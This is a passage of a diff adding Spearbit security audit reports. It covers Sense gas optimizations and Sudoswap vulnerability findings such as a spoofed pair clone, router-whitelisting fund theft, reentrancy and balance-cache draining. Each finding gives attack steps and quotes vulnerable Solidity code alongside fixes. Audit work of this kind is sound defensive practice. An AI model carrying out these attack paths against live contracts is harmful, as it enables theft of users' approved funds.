potentially saving significant gas costs by avoiding repeated clean slot writes. In the Divider.sol case, AdapterIDs appear as a very viable candidate to be packed, if it’s type size is reduced alongside the bool variable that identifies whether an adapter is enabled. In the PoolManager.sol case, the SeriesStatus enum and address could be packed into a single storage slot with the use of a struct. The team should research and consider if there are sufficient amount of vari- ables that could be lowered in type size and packed via a struct in the appro- priate order. Sense: Addressed in #155 Spearbit: We advice to also look into this issue in PoolManager.sol with the optimization ideas appended to it. 60 +3.5.10 Lower issuance And tilt In Divider.sol To uint46 / uint96 Severity: Gas Optimization Context: Divider.sol#177 Situation: This struct contains 3 address elements, which are less than 32 bytes. It does not end up using a whole storage slot. The issuance is a timestamp-based entity, and, therefore, could likely be low- ered to uint48 at least. It could fit into one of the commonly accessed ad- dresses. The tilt may be lowered as well and is currently packed with issuance. How- ever, if it can be lowered to a uint96, it could pack into another address element, thereby saving an additional storage slot. If it could be lowered to uint48, both issuance and tilt could be packed in the same slot as the address variable most accessed alongside them, yielding gas benefits from warm access and dirty slot sharing. Recommendation: The Sense team should explore if both can be safely low- ered for their logic, if they wish to realize these gains. The gains will only come in the case of them being able to go down to uint48 / uint96 at least respec- tively. +3.5.11 Redundant fdivUp Severity: Gas Optimization Context: GClaimManager.sol#L109-L130 Situation: In the function, excess() does a fdivUp, with a multiplication by FixedMath.WAD followed by a division by 10**18. As FixedMath.WAD == 10**18, this does not do anything. function excess(...) public returns (uint256 tBal) { ... if (scale - initScale > 0) { tBal = ((uBal.fmul(scale, FixedMath.WAD)).fdiv(scale - initScale, ,! FixedMath.WAD)).fdivUp( 10**18, FixedMath.WAD ); } } // same as FixedMath.WAD 61 Recommendation: Spearbit recommends checking if the above call to fdi- vUp() can be removed. Note: GClaimManager will most likely be deprecated. This issue is included for completeness. 62 diff --git a/findings_newupdate/spearbit/Sudoswap-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Sudoswap-Spearbit-Security-Review.txt new file mode 100644 index 0000000..d3896cf --- /dev/null +++ b/findings_newupdate/spearbit/Sudoswap-Spearbit-Security-Review.txt @@ -0,0 +1,34 @@ +3.1.1 Clones with malicious extradata are also considered valid clones Severity: Critical Risk Context: LSSVMPairCloner.sol#L121, LSSVMPair.sol#L687-695, LSSVMRoute r.sol#L574-594, LSSVMPairFactory.sol#L223-257, LSSVMPairCloner.sol#L206- 232 Description: Spearbit discovered that the functions verifying if a contract is a pair do so by only checking the first 54 bytes (i.e. the Proxy code). An attacker could deploy a contract that starts with the first 54 bytes of proxy code but have a malicious payload, and these functions will still verify it as a legitimate clone. We have found this to be a critical issue based on the feasibility of a potential exploit. Consider the following scenario: 1. An attacker creates a malicious pair by making a copy of the source of cloneETHPair() supplying malicious values for factory, bondingCurve, nft and poolType using a valid template for the connected contract. 2. The attacker has a contract with valid proxy code, connected to a valid template, but the rest of the parameters are invalid. 3. The Pair is initialized via a copy of initialize() of LSSVMPair, which calls __Ownable_init() to set a malicious owner. 4 4. The malicious owner calls call(), with target equal to the router contract and the calldata for the function pairTransferERC20From(): // Owner is set by pair creator function call(address payable target, bytes calldata data) external onlyOwner { // Factory is malicious LSSVMPairFactoryLike _factory = factory(); // `callAllowed()` is malicious and returns true require(_factory.callAllowed(target), "Target must be whitelisted"); (bool result, ) = target.call{value: 0}(data); require(result, "Call failed"); ,! } 5. The check for onlyOwner and require pass, therefore pairTransferERC20From() is called with the malicious Pair as msg.sender. 6. The router checks if it is called from a valid pair via isPair(): function pairTransferERC20From(...) external { // Verify caller is a trusted pair contract // The malicious pair passed this test require(factory.isPair(msg.sender, variant), "Not pair"); ... token.safeTransferFrom(from, to, amount); } 7. Because the function isPair() only checks the first 54 bytes (the runtime code including the implementation address), isPair() does not check for extra parameters factory, bondingCurve, nft or poolType: 5 function isPair(address potentialPair, PairVariant variant) ... { ... } else if (variant == PairVariant.ENUMERABLE_ETH) { return ,! LSSVMPairCloner.isETHPairClone(address(enumerableETHTemplate),potentialPair); } ... } function isETHPairClone(address implementation, address query) ... { ... // Compare expected bytecode with that of the queried contract let other := add(ptr, 0x40) extcodecopy(query, other, 0, 0x36) result := and( eq(mload(ptr), mload(other)), // Checks 32 + 22 = 54 bytes eq(mload(add(ptr, 0x16)), mload(add(other, 0x16))) ) } 8. Now the malicious pair is considered valid, the require statement in pair- TransferERC20From() has passed and tokens can be transferred to the attacker from anyone who has set an allowance for the router. Recommendation: Spearbit recommends Sudoswap to verify more values when checking if a pair is valid - especially the factory value. We also rec- ommend to consider the removal of all trust between pairs and routers, as well as the function call(). Sudoswap: Added factory check to isPair functions here. Spearbit: Acknowledged. Please double-check with the changes for the finding "Saving 1 byte Off The Constructor() Code" - especially the amount of bytes checked at the end of isETHPairClone() and isERC20PairClone(). 3.2 High Risk +3.2.1 Factory Owner can steal user funds approved to the Router Severity: High Risk Context: LSSVMPair.sol#L687-695, LSSVMRouter.sol#L574 Description: A pair owner can make arbitrary calls to any contract that has been approved by the factory owner. The code in the factory intends to prevent 6 router contracts from being approved for calls because router contracts can have access to user funds. An example includes the pairTransferERC20From() function, that can be used to steal funds from any account which has given it approval. The router contracts can nevertheless be whitelisted by first being removed as a router and then being whitelisted. This way anyone can deploy a pair and use the call function to steal user funds. Recommendation: Spearbit recommends Sudoswap to consider changing the architecture such that the router simply sends the NFTs to the pair when it calls the swap function. If you want to remove the trust from the router, make the pair store reserve balances and check tokens received against it. Sudoswap: The immediate issue of adding/removing routers are addressed in this branch here. Every time a new router is added or removed, we only toggle the allowed flag, while wasEverAllowed is always true. LSSVMPair.call() now checks if we’ve ever approved a Router. The broader issue of factory owner being able to potentially to steal pool funds is acknowledged, with other specific vectors mentioned in the audit addressed in other branches. Spearbit: Acknowledged. 3.3 Medium Risk +3.3.1 Missing check in the number of Received Tokens when tokens are transferred directly Severity: Medium Risk Context: LSSVM\contracts, LSSVMPairERC20.sol#L41-78 Description: Within the function _validateTokenInput() of LSSVMPairERC20, two methods exist to transfer tokens. In the first method via router.pairTrans ferERC20From() a check is performed on the number of received tokens. In the second method no checks are done. Recent hacks (e.g. Qubit finance) have successfully exploited safeTransfer- From() functions which did not revert nor transfer tokens. Additionally, with malicious or re-balancing tokens the number of transferred tokens might be dif- ferent from the amount requested to be transferred. 7 function _validateTokenInput(...) ... { ... if (isRouter) { ... // Call router to transfer tokens from user uint256 beforeBalance = _token.balanceOf(_assetRecipient); router.pairTransferERC20From(...) // Verify token transfer (protect pair against malicious router) require( _token.balanceOf(_assetRecipient) - beforeBalance == ,! inputAmount, "ERC20 not transferred in"); } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } } Recommendation: Spearbit recommends Sudoswap to verify the number of tokens received when these are transferred directly. Sudoswap: Risks acknowledged but no changes at this time. Pair creators would have to willingly create deploy an NFT/Token pair for a Token using non- standard ERC20 token behavior to be at risk. Spearbit: Acknowledged. +3.3.2 Malicious assetRecipient could get an unfair amount of tokens Severity: Medium Risk Context: LSSVMRouter.sol#L754-789 Description: The function _swapNFTsForToken() of LSSVMRouter calls safe- TransferFrom(), which then calls ERC721Received of assetRecipient. A ma- licious assetRecipient could manipulate its NFT balance by buying additional NFTs via the Pair and sending or selling them back to the Pair, enabling the malicious actor to obtain an unfair amount of tokens via routerSwapNFTsForTo- ken(). 8 function _swapNFTsForToken(...) ... { ... swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // call to onERC721Received of assetRecipient } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); // checks the token balance of assetRecipient } ,! ,! } Recommendation: Spearbit recommends Sudoswap to implement re-entrancy modifiers (see finding "Add Reentrancy Guards" in the "Low Risk" section of this report). We also recommend that Sudoswap implements the recommendation "Simplify the Connection Between Pair and Router" in the "Gas Optimizations" section of this report to reduce the attack surface. Finally, we recommend that Sudoswap make sure the assetRecipient is trusted. Sudoswap: We’ve also accepted the recommendation to simplify the connec- tion between the Router and the Pair, provided fix is in the issue here. Spearbit: Acknowledged. +3.3.3 Malicious Router can exploit cacheAssetRecipientNFTBalance to drain pair funds Severity: Medium Risk Context: LSSVMPair.sol#L371-379, LSSVMPair.sol#L318-366 Description: A malicious router could be whitelisted by an inattentive or a ma- licious factory owner and drain pair funds in the following exploit scenario: 1. Call the cache function. Suppose that the current balance is 10, so it gets cached. 2. Sell 5 NFTs to the pair and get paid using swapNFTsForToken. Total bal- ance is now 15 but the cached balance is still 10. 3. Call routerSwapNFTsForToken. This function will compute total_balance 9 - cached_balance, assume 5 NFTs have been sent to it and pay the user. However, no new NFTs have been sent and it already paid for them in Step 2. Recommendation: Spearbit recommends Sudoswap to implement reentrancy modifiers (see finding "Add Reentrancy Guards" in the "Low Risk" section of this report). We also suggest implementing recommendations in the "Simplify the Connection between Pair and Router" found in the "Gas Optimization" section of this report to reduce attack surface. Sudoswap: Removed this flow through the implementation of the recommen- dation here. Spearbit: Acknowledged. +3.3.4 Malicious Router can steal NFTs via Re-Entrancy attack Severity: Medium Risk Context: LSSVMPair.sol, LSSVMPairERC20.sol Description: If the factory owner approves a malicious _router, it is possible for the malicious router to call functions like swapTokenForAnyNFTs() and set is- Router to true. Once that function reaches router.pairTransferERC20From() in _validateTokenInput(), they can re-enter the pair from the router and call swapTokenForAnyNFTs() again. This second time the function reaches router.pairTransferERC20From(), al- lowing the malicious router to execute a token transfer so that the require of _validateTokenInput is satisfied when the context returns to the pair. When the context returns from the reentrant call back to the original call, the require of _validateTokenInput would still pass because the balance was cached be- fore the reentrant call. Therefore, an attacker will receive 2 NFTs by sending tokens only once. Recommendation: Spearbit recommends Sudoswap to implement reentrancy modifiers (see finding "Add Reentrancy Guards" in the "Low Risk" section of this report). Sudoswap should also consider checking if the NFT balance before and after router.pairTransferERC20From() is the same. Finally, we recommend to make sure the following contracts and addresses are trusted: the NFT contract, the ERC-20 tokens, the assetRecipient, the bonding curve, the factory, the factory owner, and the protocolFeeRecipient. 10 Sudoswap: The immediate issue is addressed in this branch. We now vali- date NFT balances after the router.pairTransferERC20From call to mitigate re- entrant balance changes by a malicious router. The broader issue of the cache function being exploitable is addressed in the GitHub Issue about simplifying the connection between the pair and the router. Spearbit: Acknowledged. +3.3.5 getAllHeldIds() of LSSVMPairMissingEnumerable is vulnerable to a denial of service attack Severity: Medium Risk Context: LSSVMPairMissingEnumerable.sol#L90-97, LSSVMPair.sol#L125 Description: The contract LSSVMPairMissingEnumerable tries to compensate for NFT contracts that do not have ERC721Enumerable implemented. However, this cannot be done for everything as it is possible to use transferFrom() to send an NFT from the same collection to the Pair. In that case the callback on- ERC721Received() will not be triggered and the idSet administration of LSSVM- PairMissingEnumerable will not be updated. This means that nft().balanceO f(address(this)); can be different from the elements in idSet. Assuming an actor accidentally, or on purpose, uses transferFrom() to send additional NFTs to the Pair, getAllHeldIds() will fail as idSet.at(i) for unregistered NFTs will fail. This can be used in a griefing attack. getAllHeldIds() in LSSVMPairMissingEnumerable: function getAllHeldIds() external view override returns (uint256[] memory) { uint256 numNFTs = nft().balanceOf(address(this)); // returns the registered + unregistered NFTs uint256[] memory ids = new uint256[](numNFTs); for (uint256 i; i < numNFTs; i++) { ids[i] = idSet.at(i); // will fail at the unregistered NFTs } return ids; ,! } The following checks performed with _nft.balanceOf() might not be accurate in combination with LSSVMPairMissingEnumerable. Risk is low because any additional NFTs making later calls to _sendAnyNFTsToRecipient() and _send- SpecificNFTsToRecipient() will fail. However, this might make it more difficult to troubleshoot issues. 11 function swapTokenForAnyNFTs(...) .. { ,! ... require((numNFTs > 0) && (numNFTs <= _nft.balanceOf(address(this))),"Ask for > 0 and <= balanceOf NFTs"); ... _sendAnyNFTsToRecipient(_nft, nftRecipient, numNFTs); // could fail ... } function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),"Must ask for > 0 and < balanceOf NFTs"); // '<' should be '<=' ... _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); // could fail ... ,! ,! } Note: The error string < balanceOf NFTs is not accurate. Recommendation: Spearbit recommends Sudoswap to use idSet.length() in order to determine the number of NFTs by changing the code in accordance with the following diff: - uint256 numNFTs = nft().balanceOf(address(this)); + uint256 numNFTs = idSet.length(); To access idSet.length() from LSSVMPair, an extra function is necessary in LSSVMPairMissingEnumerable.sol and LSSVMPairEnumerable.sol. Spearbit also suggests to fix the error string in swapTokenForSpecificNFTs. Sudoswap: Addressed in this branch here. idSet size is now used instead of NFT balanceOf. Spearbit: Acknowledged. +3.3.6 With NFT pools the protocol fees end up in assetRecipient instead of _factory Severity: Medium Risk Context: LSSVMPair.sol#L192-245, LSSVMPairERC20.sol#L90-105, LSSVMPai rETH.sol#L53-66 12 Description: Assume a scenario where an NFT pool with assetRecipient set have the received funds sent directly to the assetRecipient. Now, suppose a user executes the swapTokenForSpecificNFTs(). The function _validateTokenInput() sends the required input funds, including fees to the assetRecipient. The function _payProtocolFee() tries to send the fees to the _factory. However, this function attempts to do so from the pair con- tract. The pair contract does not have any funds because they have been sent directly to the assetRecipient. So following this action the payProtocolFee() lowers the fees to 0 and sends this number to the _factory while fees end up at assetRecipient' instead of at the _factory. The fees then end up at assetRecipient instead of at the _factory. Note: • The same issue occurs in swapTokenForAnyNFTs(). • This issue occurs with both ETH and ERC20 NFT Pools, although their logic is slightly different. • This issue occurs both when swapTokenForSpecificNFTs() is called di- rectly as well as indirectly via the LSSVMRouter. • Although the pool fees are 0 with NFT pools, the factory fee is still present. • Luckily, TRADE pools cannot have an assetRecipient as this would also create issues. 13 abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) { ,! ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); // ,! sends inputAmount to assetRecipient _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); _refundTokenToSender(inputAmount); _payProtocolFee(_factory, protocolFee); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { ... function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ,! ... uint256 pairTokenBalance = _token.balanceOf(address(this)); if (protocolFee > pairTokenBalance) { protocolFee = pairTokenBalance; } _token.safeTransfer(address(_factory), protocolFee); // tries to send from the Pair contract } ,! } abstract contract LSSVMPairETH is LSSVMPair { function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ,! ... uint256 pairETHBalance = address(this).balance; if (protocolFee > pairETHBalance) { protocolFee = pairETHBalance; } payable(address(_factory)).safeTransferETH(protocolFee); // tries to send from the Pair contract } ,! } Recommendation: Spearbit recommends Sudoswap to first be aware of the following: • In ETH NFT pools, ETH is first sent to the Pair contract, then to other par- ties. 14 • In ERC20 NFT pools, ERC20 tokens are sent directly from the original caller to other parties. This means that when an assetRecipient is set, the ERC20 does not touch the pair. Second, we recommend that Sudoswap change swapTokenForSpecificNFTs() as such: function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); _validateTokenInput(inputAmount - protocolFee, isRouter, routerCaller, _factory); ... _payProtocolFee(_factory, protocolFee); _payProtocolFeeByOriginalCaller(_factory, protocolFee, isRouter, routerCaller); ,! - + ,! - + ,! } We also recommend that Sudoswap perform the same update for swapToken- ForAnyNFTs(). Third, we recommend creating a new _payProtocolFeeByOriginalCaller() in LSSVMPairERC20() that combines the functionality of _payProtocolFee() and _validateTokenInput(). This is due to the assumption that the function should also be able to retrieve the ERC20 tokens from the original caller. Note: _payProtocolFeeByOriginalCaller in LSSVMPairETH() can just do the same as _payProtocolFee(). Lastly, it may be wise for Sudoswap to consider renaming _payProtocolFee() to _payProtocolFeeFromPair(), clarifying the difference. Note: The functionality of _payProtocolFeeFromPair() is still necessary for routerSwapNFTsForToken() and swapNFTsForToken() because in that case, the funds are indeed in the Pair. Sudoswap: Addressed in the branch here. Pulling tokens and taking the pro- tocol fee is now done in the same step when swapping from tokens to NFTs so there should always be tokens to send for the fee. The original _payProtocolFee function has been renamed _payProtocolFeeFromPair as suggested. Spearbit: Acknowledged. 15 +3.3.7 Error codes of Quote functions are unchecked Severity: Medium Risk Context: LSSVMPair.sol#L389-431, LSSVMRouter.sol Description: The error return values from functions getBuyNFTQuote() and getSellNFTQuote() are not checked in contract LSSVMRouter.sol, whereas other functions in contract LSSVMPair.sol do check for error==CurveErrorCodes.Err or.OK. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ,! ,! ,! ... function getBuyNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } function swapTokenForAnyNFTs(...) (uint256 inputAmount) { external payable virtual returns ... (error, ...) = _bondingCurve.getBuyInfo(...); require(error == CurveErrorCodes.Error.OK, "Bonding curve error"); ... } } LSSVMRouter.sol#L526 (, , pairOutput, ) = swapList[i].pair.getSellNFTQuote(...); The following contract lines contain the same code snippet below: LSSVMRoute r.sol#L360, LSSVMRouter.sol#L407, LSSVMRouter.sol#L450, LSSVMRouter.so l#L493, LSSVMRouter.sol#L627, LSSVMRouter.sol#L664 (, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...); Note: The current Curve contracts, which implement the getBuyNFTQuote() and getSellNFTQuote() functions, have a limited number of potential errors. However, future Curve contracts might add additional error codes. Recommendation: Check the error code of functions getBuyNFTQuote() and getSellNFTQuote() in contract LSSVMRouter.sol. 16 Sudoswap: Addressed in this branch here. LSSVMRouter now reverts if the Error is not Error.OK for a normal swap, or it skips performing the swap during a robust swap operation. Spearbit: Acknowledged. 3.4 Low Risk +3.4.1 Swaps can be front run by Pair Owner to extract any profit from slippage allowance Severity: Low Risk Context: LSSVMPair.sol#L630, LSSVMPair.sol#L644, LSSVMPair.sol#L660 Description: If the user adds a nonzero slippage allowance, the pair owner can front run the swap to increase the fee/spot price and steal all of the slippage allowance. This basically makes sandwich attacks much easier and cheaper to execute for the pair owner. Recommendation: Spearbit recommends that Sudoswap add a time delay of a few hours between pair owner submitting a new price/fee/delta and the exe- cution of such new changes coming into effect. If this is not ideal for Sudoswap, Spearbit alternatively recommends to disallow the change of these parameters and requiring the pair owner to deploy a new pair instead. Sudoswap: Acknowledged, but no changes have been made to the pricing model at this time. Still talking interally about what sort of time delay would be acceptable for a spotPrice change and how to change pricing logic if so. Spearbit: Acknowledged. +3.4.2 Add check for numItems == 0 Severity: Low Risk Context: LinearCurve.sol#L38-58, ExponentialCurve.sol#L45-65, LinearCu rve.sol#L100-120, ExponentialCurve.sol#L108-129 Description: Functions getBuyInfo() and getSellInfo() in LinearCurve.sol check that numItems != 0. However, the same getBuyInfo() and getSellInfo() functions in ExponentialCurve.sol do not perform this check. 17 contract LinearCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // We only calculate changes for buying 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } function getSellInfo(...) ... { // We only calculate changes for selling 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } } contract ExponentialCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // No check on `numItems` uint256 deltaPowN = delta.fpow(numItems, FixedPointMathLib.WAD); ... } function getSellInfo(... ) ... { // No check on `numItems` uint256 invDelta = ,! FixedPointMathLib.WAD.fdiv(delta,FixedPointMathLib.WAD); ... } } If the code remains unchanged, an erroneous situation may not be caught and funds might be sent when selling 0 NFTs. Luckily, when numItems == 0 then result outputValue of the functions in Expo- nentialCurve is still 0, so there is no real issue. However, it is still important to fix this because a derived version of these functions might be used by future developers. Recommendation: Spearbit recommends adding a check for numItems == 0 to getBuyInfo() and getSellInfo() of ExponentialCurve.sol. Sudoswap: Addressed in branch here. Spearbit: Acknowledged. 18 +3.4.3 Disallow arbitrary function calls to LSSVMPairETH Severity: Low Risk Context: LSSVMPairETH.sol#L133-139 Description: The contract LSSVMPairETH contains an open fallback() func- tion. The fallback() is most likely necessary because the proxy adds calldata and the receive() function, therefore not receiving the ETH. However, without additional checks any function call to an ETH Pair will succeed. This could result in unforseen scenarios which hackers could potentially exploit. fallback() external payable { emit TokenDeposited(msg.value); } Recommendation: Spearbit recommends adapting the fallback() function in the following way to ameliorate this risk: fallback() external payable { + require (msg.data.length == _immutableParamsLength()); // only allow calls without function selector emit TokenDeposited(msg.value); ,! } Sudoswap: Addressed here. Spearbit: Acknowledged. +3.4.4 Only transfer relevant funds for PoolType Severity: Low Risk Context: LSSVMPairFactory.sol#L363-416 Description: The functions _initializePairETH() and _initializePairERC20() allow for the transfer of ETH/ERC20 and NFTs even when this is not relevant for the PoolType. Although funds can be rescued from the Pair, it is perhaps better to prevent these types of mistakes. 19 function _initializePairETH(...) ... { ... // Transfer initial `ETH` to `pair` // Only relevant for `PoolType.TOKEN` or `PoolType.TRADE` payable(address(_pair)).safeTransferETH(msg.value); ... // Transfer initial `NFT`s from `sender` to `pair` for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } } function _initializePairERC20(...) ... { ... // Transfer initial tokens to pair // Only relevant for PoolType.TOKEN or PoolType.TRADE _token.safeTransferFrom(msg.sender,address(_pair),_initialTokenBalance); ... // Transfer initial NFTs from sender to pair for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } } Recommendation: Spearbit recommends Sudoswap to only transfer the ET H/ERC20/NFTs that are relevant for the Pair PoolType. Sudoswap: Acknowledged, but no change for now. Clients will be responsi- ble for ensuring users deposit the correct assets, and the existence of rescue functions makes it possible to correct. Spearbit: Acknowledged. +3.4.5 Check for 0 parameters Severity: Low Risk Context: LSSVMPairFactory.sol#L291-356 Description: Functions setCallAllowed() and setBondingCurveAllowed() do not check that target != 0 while the comparable function setRouterAllowed() does check for _router != 0. 20 function setCallAllowed(address payable target, bool isAllowed) external ,! onlyOwner { ... // No check on target callAllowed[target] = isAllowed; } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external ,! onlyOwner { ... // No check on bondingCurve bondingCurveAllowed[bondingCurve] = isAllowed; } function setRouterAllowed(LSSVMRouter _router, bool isAllowed) external onlyOwner { require(address(_router) != address(0), "0 router address"); ... routerAllowed[_router] = isAllowed; ,! } Recommendation: Spearbit recommends Sudoswap to consider adding a check for 0 parameters in setCallAllowed() and setBondingCurveAllowed(). If 0 checks are considered to be unnecessary because these functions are pro- tected by onlyOwner, then the 0 check could be removed from setRouterAl- lowed(). Sudoswap: Removed zero address check in setRouterAllowed for consistency here. Spearbit: Acknowledged. +3.4.6 Potentially undetected underflow In assembly Severity: Low Risk Context: LSSVMPair.sol#L447-494, LSSVMPairERC20.sol#L24-32 Description: Functions factory(), bondingCurve(), nft(), poolType(), and token() have an assembly based calculation where the paramsLength is sub- tracted from calldatasize(). Assembly underflow checks are disregarded and if too few parameters are supplied in calls to the functions in the LSSVMPair contract, this calculation may underflow, resulting in the values for factory(), bondingCurve(), nft(), poolType(), and token() to be read from unexpected pieces of memory. This will be usually zeroed therefore execution will stop at some point. However, it is safer to prevent this from ever happening. 21 function factory() public pure returns (LSSVMPairFactoryLike _factory) { ... assembly {_factory := shr(0x60,calldataload(sub(calldatasize(), paramsLength)))} ,! } function bondingCurve() public pure returns (ICurve _bondingCurve) { ... assembly {_bondingCurve := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 20)))} ,! } function nft() public pure returns (IERC721 _nft) { ... assembly {_nft := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 40)))} ,! } function poolType() public pure returns (PoolType _poolType) { ... assembly {_poolType := shr(0xf8,calldataload(add(sub(calldatasize(), paramsLength), 60)))} ,! } function token() public pure returns (ERC20 _token) { ... assembly {_token := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 61)))} ,! } Recommendation: Spearbit recommends Sudoswap to implement the follow- ing changes for all functions so that an underflow will be detected at the Solidity level. + uint256 offset = msg.data.length - paramsLength; - assembly {_token := shr(... ,calldataload(add(sub(calldatasize(), paramsLength), ...)))} ,! + assembly {_token := shr(... ,calldataload(add(offset, ...)))} Sudoswap: Acknowledged, but no change for now, as we only use this pattern for the purpose of reading variables meant to be immutable, so all values are hard-coded, which makes the possibility of underflow unlikely. Spearbit: Acknowledged. +3.4.7 Check number of NFTs is not 0 Severity: Low Risk 22 Context: LSSVMPair.sol#L258-310, LSSVMPair.sol#L318-366, LSSVMPair.so l#L413-431 Description: Functions swapNFTsForToken(), routerSwapNFTsForToken(), and getSellNFTQuote() in LSSVMPair.sol do not perform input verification on the number of NFTs. If _bondingCurve.getSellInfo() accidentally happens to re- turn a non-zero value, then an unfair amount of tokens will be given back to the caller. The current two versions of bondingCurve do return 0, but a future version might accidentally return non-zero. Note: 1. getSellInfo() is supposed to return an error when numNFTs == 0, but this does not always happen. This error code is not always checked. function swapNFTsForToken(uint256[] calldata nftIds, ...) external virtual ,! ,! returns (uint256 outputAmount) { ... // No check on `nftIds.length` (error, newSpotPrice, outputAmount, protocolFee) = nftIds.length,..); _bondingCurve.getSellInfo(..., ... } function routerSwapNFTsForToken(address payable tokenRecipient) ... { ,! ... uint256 numNFTs = _nft.balanceOf(getAssetRecipient()) - _assetRecipientNFTBalanceAtTransferStart; ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., numNFTs, ...); ,! } function getSellNFTQuote(uint256 numNFTs) ... { ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = bondingCurve().getSellInfo(..., numNFTs,...); ... ,! } 2. For comparison, the function swapTokenForSpecificNFTs() does perform an entry check on the number of requested NFTs. 23 function swapTokenForSpecificNFTs(uint256[] calldata nftIds,...) ... { ... //There is a check on the number of requested `NFT`s require( (nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), "Must ask for > 0 and < balanceOf NFTs"); // check is present ... ,! ,! } Recommendation: Spearbit recommends Sudoswap to implement checks and make sure the number of NFTs is greater than 0. Sudoswap: Added 0 check to the swapNFTForTokens function here. Spearbit: Acknowledged. +3.4.8 Avoid utilizing inside knowledge of functions Severity: Low Risk Context: LSSVMRouter.sol, LSSVMPair.sol, LSSVMPairETH.sol Description: ETH based swap functions use isRouter==false and router- Caller==address(0) as parameters to swapTokenForAnyNFTs() and swapToken- ForSpecificNFTs(). These parameters end up in _validateTokenInput(). The LSSVMPairETH version of this function does not use those parameters, so it is not a problem at this point. However, the call actually originates from the Router so functionally isRouter should be true. Our concern is that using inside knowledge of the functions might potentially introduce subtle issues in the following scenarios: 24 function robustSwapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function robustSwapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... ,! } function _swapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function _swapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: ,! pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... } function swapTokenForAnyNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } function swapTokenForSpecificNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... ,! } abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(..., bool, /*isRouter*/ /*routerCaller*/ ... ) { address, // doesn't use isRouter and routerCaller } ,! } Recommendation: Spearbit recommends Sudoswap to consider making the changes listed below in the follwoing functions _swapETHForSpecificNFTs, ro- bustSwapETHForAnyNFTs, robustSwapETHForSpecificNFTs, and _swapETHForAnyN- 25 FTs: - remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ,! + remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: ,! pairCost}(swapList[i].nftIds, nftRecipient, true, msg.sender); - remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ,! + remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: ,! pairCost}(swapList[i].numItems, nftRecipient, true, msg.sender); Sudoswap: Addressed in this branch here. Spearbit: Acknowledged. +3.4.9 Add Reentrancy Guards Severity: Low Risk Context: All LSSVM Contracts. Specifically, three categories of functions: 1. Functions withdrawing ETH 2. Functions sending ETH 3. Functions that use safeTransferFrom() to call external addresses. Instances of functions withdrawing ETH: LSSVMPairFactory.sol#L272, LSSVM- PairETH.sol#L104 Instances of functions sending ETH: LSSVMPairETH.sol#L34, LSSVMPairETH.sol#L46, LSSVMPairETH.sol#L79, LSSVMRouter.sol#L376, LSSVMRouter.sol#L423, LSSVM- Router.sol#L640, LSSVMRouter.sol#L677 Uses of safeTransferFrom() to external addresses: LSSVMRouter.sol#L544, LSSVMRouter.sol#L593, LSSVMPairFactory.sol#L773, LSSVMPairEnumerable.sol#L33, 